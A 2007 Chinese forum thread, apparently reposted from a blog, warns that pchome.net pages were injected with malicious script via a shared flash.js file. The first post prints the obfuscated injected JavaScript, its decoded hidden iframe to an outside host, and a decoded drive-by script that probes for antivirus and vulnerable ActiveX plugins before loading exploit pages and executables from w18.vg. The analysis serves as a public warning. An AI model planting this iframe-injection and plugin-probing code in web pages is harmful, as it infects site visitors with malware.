设为首页收藏本站
开启辅助访问

下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

 下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
下沙论坛»下沙论坛 ╃摩登&时代╃ 科技.电脑网络 小心!Pchome.net出现大面积挂马现象,敬请会员们注意安 ...
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
返回列表 发新帖
查看: 3726|回复: 3
打印 上一主题 下一主题

小心!Pchome.net出现大面积挂马现象,敬请会员们注意安全!

[复制链接]
竹木刀

该用户从未签到
跳转到指定楼层
1
发表于 2007-12-29 15:56:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
截至2007-12-28 18:17 仍修复: L3 `& E5 \& j
- u8 s# f) [! e
- Z: R0 m& E! n- O# V
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I, S: H7 h2 n% Y5 A9 y

5 T; `1 ^6 U4 |7 m6 Z! ]& J( t从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView3 d* Y* Z8 ^7 ^8 u9 c
: P$ m9 o- r3 D* m( X
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:
# F5 F! ?! g; M8 W: T$ h
* G$ ]0 f  |, L8 X) x6 c8 N9 M* U1 wwindow["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');5 H: y: e% Q0 ~" f& i

' L  Q' n3 |4 a; @0 M也就是这个了:2 \, [" L2 u* h; |

) K8 h, Q7 f7 t% @. owindow["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');5 ?$ [, v/ y2 L0 s, ~

) q0 K) W* D8 R- t但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:% t2 ~# R: y4 j8 c% ~( I

, V! a6 _$ F9 }" A) |3 j% y- E<script language="javascript" type="text/javascript">
7 V0 z+ x; H/ ]writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
* I/ Z" {5 v, \. J. n+ f/ j3 Y</script>
5 z8 b' x+ f2 B/ N& Q& i2 L5 ?/ F9 \! ]6 X' C, t1 q' ]9 w7 [
有了这个,iframe就生效了;经过一番调用和解密后得:
* w# ?3 R3 ], g
/ ?4 _2 @% w8 A& [1 x& l& p' Wfunction bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}
- t1 W! M+ l: n3 O/ ^8 W1 s0 h" t1 ~, s# o
K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
, U- u  F% N' w. M+ o" ~1 p* J0 F/ K

7 \/ ?7 ^: ^7 [" N) L. x" x* R! b挑了几个解密得:http://w18.vg/s.exe7 F4 {' e/ m, U: ^2 I5 \) H
4 b/ p. `6 B. k+ q
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe
  X. ]8 \$ w5 q) m: }. @4 ]! R2 F! Q3 S( R; ]& l2 K  P$ i
有点面熟的东西……2 V* L( w2 |3 }8 e; W+ b' l+ R
- E  s9 C+ i% `! s
##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
  D0 a" t, }* {! w# v5 _
, z9 G$ M% ~6 R2 M' z/ j从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。
2 k2 l# ^6 t# I+ }7 K) L6 d# q
( ]( k& q' q! y3 XK$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE/ D6 ^% U$ E! w2 k3 y0 x% @' Q
; A; D, n7 V2 A: t  F
转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html3 e1 P# B5 q" M" o9 t8 A! y
  s( K+ l# E. B- Q0 }  z
5 e4 X% Z8 H" R. g! g0 S
作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩
回复

使用道具 举报

煎饼
  • TA的每日心情
    擦汗
    2025-1-24 09:05

    • 签到天数: 2402 天

    [LV.Master]伴坛终老
    2
    发表于 2007-12-29 21:36:43 | 只看该作者
    多谢。it类一般只去pconline和zol
    回复 支持 反对

    使用道具 举报

    竹木刀

    该用户从未签到
    3
     楼主| 发表于 2007-12-29 21:57:51 | 只看该作者
    我是四处流窜的,IT信息看CB比较多。
    回复 支持 反对

    使用道具 举报

    煎饼
  • TA的每日心情
    擦汗
    2025-1-24 09:05

    • 签到天数: 2402 天

    [LV.Master]伴坛终老
    4
    发表于 2007-12-30 01:41:55 | 只看该作者
    对了。忘记说cnbeta最常去了
    回复 支持 反对

    使用道具 举报

    返回列表 发新帖

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表